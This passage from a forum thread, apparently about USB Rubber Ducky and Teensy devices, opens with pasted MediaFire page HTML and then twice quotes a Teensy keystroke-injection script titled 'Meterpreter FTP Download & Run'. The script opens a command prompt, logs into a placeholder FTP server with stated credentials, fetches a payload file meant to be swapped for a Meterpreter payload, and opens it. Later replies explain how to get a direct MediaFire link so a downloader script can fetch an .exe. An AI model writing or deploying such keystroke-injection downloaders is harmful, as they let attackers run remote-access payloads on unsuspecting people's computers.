id="PLAY_fileAuthor" title="shared by "sparkydude2""> shared by "sparkydude2"</span> </div> <input id="PLAY_newFileName" type="text" name="PLAY_newFileName" value="Ducky.txt" style="display:none;"/> </div> <div id="audioControlGroup">   <a href="/?8vzt89wef1qnr3n" target="_blank"><div id="aZQ" class="gbtnPrimary ico30download" title="Download track"><span>Download</span></div></a>  <div id="PLAY_audio_shareFile" class="gbtnPrimary ico30share" title="Share track"><span>Share</span></div>  <div id="PLAY_audio_follow" class="play-saveToAccount gbtnPrimary ico30saveToAccount" title="Follow"><span>Follow</span></div> <div id="PLAY_audio_unfollow" class="play-unfollow ico30following gbtnPrimary non-owner-only"><span class="followingTxt">Following</span><span class="unfollowHover">Unfollow</span></div> </div> <div id="videoControlGroup">   <a href="/?8vzt89wef1qnr3n" target="_blank"><div id="aZQ" class="gbtnAlt ico30download" title="Download video"><span>Download</span></div></a>  <div id="PLAY_video_shareFile" class="gbtnAlt ico30share" title="Share video"><span>Share</span></div>  <div id="PLAY_video_follow" class="play-saveToAccount gbtnAlt ico30saveToAccount"><span>Follow</span></div> <div id="PLAY_video_unfollow" class="play-unfollow ico30following gbtnAlt non-owner-only"><span class="followingTxt">Following</span><span class="unfollowHover">Unfollow</span></div> </div> </div>  <div id="headerControlsDocView" class="headerControls">  <div class="filenameShare"> <div id="FP_fileDetails"> <span class="title"> <a href="/" class="customLogoShared"><img src=""/></a> <a onclick="ajf();"> <span id="FP_fileName" title="Ducky.txt">Ducky.txt</span> <span class="fileRenameIndicator"></span> </a> </span><span id="FP_fileAuthor" title="shared by "sparkydude2""> shared by "sparkydude2"</span> </div> <input id="FP_newFileName" type="text" name="FP_newFileName" value="Ducky.txt"/> </div> <div class="headerControlsBtns mobile-nav">  <a id="FP_next" class="gbtnPrimary ico30nextItem rightBtn" href="javascript:void(0);"></a> <div id="FP_pageCounter" class="pageCounter"> <span class="FP_currentPage">1</span> / <span class="FP_numPages">--</span> </div> <a id="FP_previous" class="gbtnPrimary ico30prevItem leftBtn" href="javascript:void(0);"></a> <a id="FP_zoomOut" class="gbtnPrimary ico30zoomOut rightBtn"></a> <a id="FP_zoomIn" class="gbtnPrimary ico30zoomIn leftBtn"></a> </div>  <div class="headerControlsBtns">  <div id="docControlGroup">   <a href="/?8vzt89wef1qnr3n" target="_blank"><div id="aZQ" class="gbtnPrimary ico30download" title="Download document"><span>Download</span></div></a>  <div id="FP_shareFile" class="gbtnPrimary ico30share" title="Share document"><span>Share</span></div>  <div id="FP_saveToAccount" onclick="FollowFile()" class="gbtnPrimary ico30saveToAccount" title="Follow"><span>Follow</span></div> <div onclick="UnfollowFile()" class="ico30following gbtnPrimary non-owner-only"><span class="followingTxt">Following</span><span class="unfollowHover">Unfollow</span></div> </div>    <div class="codeViewBtns">  <div class="dropdown ddRight dropdownOnClick"> <a class="gbtnPrimary ico30settings rightBtn" href="javascript:void(0);" title="Settings"></a> <ul> <li><label><input type="checkbox" checked="checked"/> Auto Save Document</label></li> <li class="divider"></li> <li class="submenu"> Themes <span class="indicator-right"></span> <ul> <li class="ddSectionLabel">Light Themes</li> <li data-theme="dreamweaver" class="dreamweaverTheme">Dreamweaver</li> <li data-theme="eclipse" class="eclipseTheme">Eclipse</li> <li data-theme="github" class="githubTheme">GitHub</li> <li data-theme="textmate" class="textmateTheme">TextMate</li> <li data-theme="xcode" class="xcodeTheme">XCode</li> <li class="divider"></li> <li class="ddSectionLabel">Dark Themes</li> <li data-theme="chaos" class="chaosTheme">Chaos</li> <li data-theme="cobalt" class="cobaltTheme">Cobalt</li> <li data-theme="monokai" class="monokaiTheme">Monokai</li> <li data-theme="twilight" class="twilightTheme">Twilight</li> <li data-theme="vibrant_ink" class="vibrant_inkTheme">Vibrant Ink</li> </ul> </li> </ul> </div> <a class="gbtnPrimary ico30replace centerBtn" href="javascript:void(0);" title="Replace in document"></a> <a class="gbtnPrimary ico30search centerBtn" href="javascript:void(0);" title="Find in document"></a> <a class="gbtnPrimary ico30save leftBtn" href="javascript:void(0);" title="Save document"><span>Save</span><span class="savingTxt">Saving…</span></a> </div>  </div> </div>     </div>  <div id="fb-root"></div>  <script type="text/javascript">$('.floatingTab').click(function(e){if($(this).hasClass('open')){$(this).removeClass('open');$(this).parent().animate({right: -380},250,'easeOutExpo');}else{$(this).addClass('open');$(this).parent().animate({right:0},700,'easeOutExpo');fRequestHelpCode();}});$('.floatingTabsButtons .cancelBtn').click(function(e){$('.floatingTab').removeClass('open');$(this).parent().parent().animate({right: -380},250,'easeOutExpo');});function fRequestHelpCode(){if(!$(".help_code_target").text()){$(".help_code_target").hide();$.ajax({type:'POST',url:'/dynamic/get_help_code.php',dataType:'json',data:{page:window.location.toString()},success:function(Ha){if(Ha&&Ha.help_code){$(".help_code_target").show().text(Ha.help_code);$("#submit_ticket_anchor").attr("href","http://www.mediafire.com/help/submit_a_ticket.php?help_code="+Ha.help_code);}else{$(".help_code_target").show().text("Unknown Error");}},error:function(){$(".help_code_target").show().text("Unknown Error");}});}} </script>  <script language="JavaScript" src="https://cdnssl.mediafire.com/js/master_107763.js" type="text/javascript"></script> <script language="JavaScript" type="text/JavaScript">bkA='rkrxmm0j86b';identifier='';UserLogin='0';UserEmail='n/a';fu= 0;lB= 0;if(lB==1)var bdq='https';else var bdq='http';var sPlaxoInsert='';var WRInitTime=(new Date()).getTime();var wM= 0;var wL= 0;var bLinkedFacebook= 0;var bLinkedTwitter= 0;var FBAppId='124578887583575';var yO= 120000;var yP= 120000;var mI;try{jQuery(function($){function aaP(abv){return abv.replace(/\W+/,"-").toLowerCase();};bdz();FHI_FadeTimer=null,FHI_FadeDelay=2000,FHI_DisableTimerCount=false,FHI_IconsWrapper=$("body.myfiles #subFooterWrap, body.filePreview #subFooterWrap, body.fileEdit #subFooterWrap");FHI_HideFooterHelpIcons=function(){if(!FHI_DisableTimerCount&& !$("#footer").hasClass("tabMF")&& !$("#footer").hasClass("tabMFhelp")){FHI_IconsWrapper.fadeOut("slow");}};$("body").bind("mousemove.fhi",function(){FHI_IconsWrapper.fadeIn("fast");clearTimeout(FHI_FadeTimer);if(!FHI_DisableTimerCount&& !$("#footer").hasClass("tabMF")&& !$("#footer").hasClass("tabMFhelp")){FHI_FadeTimer=setTimeout(FHI_HideFooterHelpIcons,FHI_FadeDelay);}});FHI_IconsWrapper.on("mouseenter.fhi",function(){FHI_DisableTimerCount=true;}).on("mouseleave.fhi",function(){FHI_DisableTimerCount=false;});var Jd=BrowserName();if(Jd==="Internet Explorer"){document.body.className=document.body.className.replace(/(\sie\d+|^ie\d+)/g,'');Jd="ie"+parseInt(Bm(),10);}if(Jd==="Opera"&&parseInt(Bm(),10)>=15){Jd="newOpera";}$(document.body).addClass(aaP(lc())+" "+aaP(Jd));$('#form_login1').keydown(function(e){e=e||window.event;if(e.keyCode==13&&($('#login_pass').val()!=''||$('#login_email').val()!='')){$(this).closest('form').submit();return false;}});$("#page_screen").on("click",QU);});}catch(e){asO(e,'HDR:os_browser_check');}  var RZ='http://www.mediafire.com/?cbq9bcjdch3h4hf'; </script> <script type="text/javascript">try{$(document).ready(function(){  aoy("free,pro,biz,tools");  });}catch(e){asO(e,'HDR:show_menu');} </script> <script type="text/javascript">try{setInterval(function(){if(aL('mfloggedoff')=='true'){window.localStorage&&localStorage.clear();top.location='/logout.php';}},30000);}catch(e){} </script>     <script type="text/javascript" src="https://cdnssl.mediafire.com/js/jquery.client.js"></script> <script type="text/javascript" src="https://cdnssl.mediafire.com/js/pdf-viewer_107763.js"></script>    <script type="text/javascript">try{LoadIframeLightbox('/dynamic/template_popup.php?page=upgrade_browser&class=myfiles',780,490);}catch(e){asO(e,'MYF:upgradeBrowserPopup');} </spoiler> 

THIS IS NOT WHAT THE TEXT FILE THAT I UPLOADED SAID.

Edited by Mr-Protocol
Link to comment
Share on other sites

Never really messed with powershell. But I did make this for the old Teensy ducky way back when.

/* Meterpreter FTP Download & Run

By: Mr-Protocol

*/
int Pwned = 0;
int ledPin = 11; 

void setup()
{
  //initialize the digital pin as an ouput.
  pinMode(ledPin, OUTPUT);
}

void loop()
{
  delay(20000);
  if (Pwned == 0)
    {
      digitalWrite(ledPin, HIGH); //set LED on
      CommandAtRunBar("cmd");
      delay(500);
      Keyboard.print("cd C:\\Users\\Public\\Documents");
      PressAndRelease(KEY_ENTER,1);
      delay(50);
      Keyboard.print("del payload.txt");
      PressAndRelease(KEY_ENTER,1); //removes payload if it exists.
      Keyboard.print("ftp");
      PressAndRelease(KEY_ENTER,1);
      Keyboard.print("open ftp.server.ip port");
      PressAndRelease(KEY_ENTER,1);
      delay(500);
      Keyboard.print("rubberducky"); //username for ftp
      PressAndRelease(KEY_ENTER,1);
      delay(50);
      Keyboard.print("USBHACKS"); //password for ftp
      PressAndRelease(KEY_ENTER,1);
      Keyboard.print("get payload.txt"); //Modify to meterpreter payload
      PressAndRelease(KEY_ENTER,1);
      delay(8000); //time for download estimated.
      Keyboard.print("quit"); //exit ftp client
      PressAndRelease(KEY_ENTER,1);
      Keyboard.print("notepad.exe payload.txt");
      PressAndRelease(KEY_ENTER,1);
      Keyboard.print("exit");
      PressAndRelease(KEY_ENTER,1);
      Pwned = 1;
    }
  digitalWrite(ledPin, LOW); //set LED off
}

void CommandAtRunBar(char *SomeCommand)
{
  Keyboard.set_modifier(128); //Windows key
  Keyboard.set_key1(KEY_R); // use r key
  Keyboard.send_now(); // send strokes
  Keyboard.set_modifier(0); //prep release of control keys
  Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times.
  Keyboard.send_now(); //Send the key changes
  delay(500);
  Keyboard.print(SomeCommand);
  Keyboard.set_key1(KEY_ENTER); 
  Keyboard.send_now(); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
}

void PressAndRelease(int KeyCode,int KeyCount)
{
  int KeyCounter=0;
  for (KeyCounter=0; KeyCounter!=KeyCount; KeyCounter++)
  {
    Keyboard.set_key1(KeyCode); // use r key
    Keyboard.send_now(); // send strokes
    Keyboard.set_key1(0); 
    Keyboard.send_now(); // send strokes
  }
}

I modified some of the code. This is for example purposes.

Link to comment
Share on other sites

Never really messed with powershell. But I did make this for the old Teensy ducky way back when.

/* Meterpreter FTP Download & Run

By: Mr-Protocol

*/
int Pwned = 0;
int ledPin = 11; 

void setup()
{
  //initialize the digital pin as an ouput.
  pinMode(ledPin, OUTPUT);
}

void loop()
{
  delay(20000);
  if (Pwned == 0)
    {
      digitalWrite(ledPin, HIGH); //set LED on
      CommandAtRunBar("cmd");
      delay(500);
      Keyboard.print("cd C:\\Users\\Public\\Documents");
      PressAndRelease(KEY_ENTER,1);
      delay(50);
      Keyboard.print("del payload.txt");
      PressAndRelease(KEY_ENTER,1); //removes payload if it exists.
      Keyboard.print("ftp");
      PressAndRelease(KEY_ENTER,1);
      Keyboard.print("open ftp.server.ip port");
      PressAndRelease(KEY_ENTER,1);
      delay(500);
      Keyboard.print("rubberducky"); //username for ftp
      PressAndRelease(KEY_ENTER,1);
      delay(50);
      Keyboard.print("USBHACKS"); //password for ftp
      PressAndRelease(KEY_ENTER,1);
      Keyboard.print("get payload.txt"); //Modify to meterpreter payload
      PressAndRelease(KEY_ENTER,1);
      delay(8000); //time for download estimated.
      Keyboard.print("quit"); //exit ftp client
      PressAndRelease(KEY_ENTER,1);
      Keyboard.print("notepad.exe payload.txt");
      PressAndRelease(KEY_ENTER,1);
      Keyboard.print("exit");
      PressAndRelease(KEY_ENTER,1);
      Pwned = 1;
    }
  digitalWrite(ledPin, LOW); //set LED off
}

void CommandAtRunBar(char *SomeCommand)
{
  Keyboard.set_modifier(128); //Windows key
  Keyboard.set_key1(KEY_R); // use r key
  Keyboard.send_now(); // send strokes
  Keyboard.set_modifier(0); //prep release of control keys
  Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times.
  Keyboard.send_now(); //Send the key changes
  delay(500);
  Keyboard.print(SomeCommand);
  Keyboard.set_key1(KEY_ENTER); 
  Keyboard.send_now(); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
}

void PressAndRelease(int KeyCode,int KeyCount)
{
  int KeyCounter=0;
  for (KeyCounter=0; KeyCounter!=KeyCount; KeyCounter++)
  {
    Keyboard.set_key1(KeyCode); // use r key
    Keyboard.send_now(); // send strokes
    Keyboard.set_key1(0); 
    Keyboard.send_now(); // send strokes
  }
}

I modified some of the code. This is for example purposes.

Thanks for the example. Can someone help with the downloader problem? Thanks protocol

Link to comment
Share on other sites

OK. When you are downloading your .exe file from mediafire, you always have to click the big "DOWNLOAD NOW" Button. Right Click on that button, and click "Copy Link Address" (Chrome has this, not sure about other browsers, although they will have some alternative.)

Copy and paste this URL into your downloader script and it should work.

The reason that you have to do this is that the page where you upload the file is where you are supposed to go and actually view the nice glitzy looking webpage, not the acutal file which would be viewed in a text-based most likely apache webserver layout. By specifying the direct URL, you are actually giving the exact address of your file that you wish to download.

Sorry if my explanation isn't that clear. Just give it a go and message me when you have tried it.

Link to comment
Share on other sites

OK. When you are downloading your .exe file from mediafire, you always have to click the big "DOWNLOAD NOW" Button. Right Click on that button, and click "Copy Link Address" (Chrome has this, not sure about other browsers, although they will have some alternative.)

Copy and paste this URL into your downloader script and it should work.

The reason that you have to do this is that the page where you upload the file is where you are supposed to go and actually view the nice glitzy looking webpage, not the acutal file which would be viewed in a text-based most likely apache webserver layout. By specifying the direct URL, you are actually giving the exact address of your file that you wish to download.

Sorry if my explanation isn't that clear. Just give it a go and message me when you have tried it.

Thanks for all the help. I will try today at about 4 and tell you if it works.

Edited by Haxineer1337
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...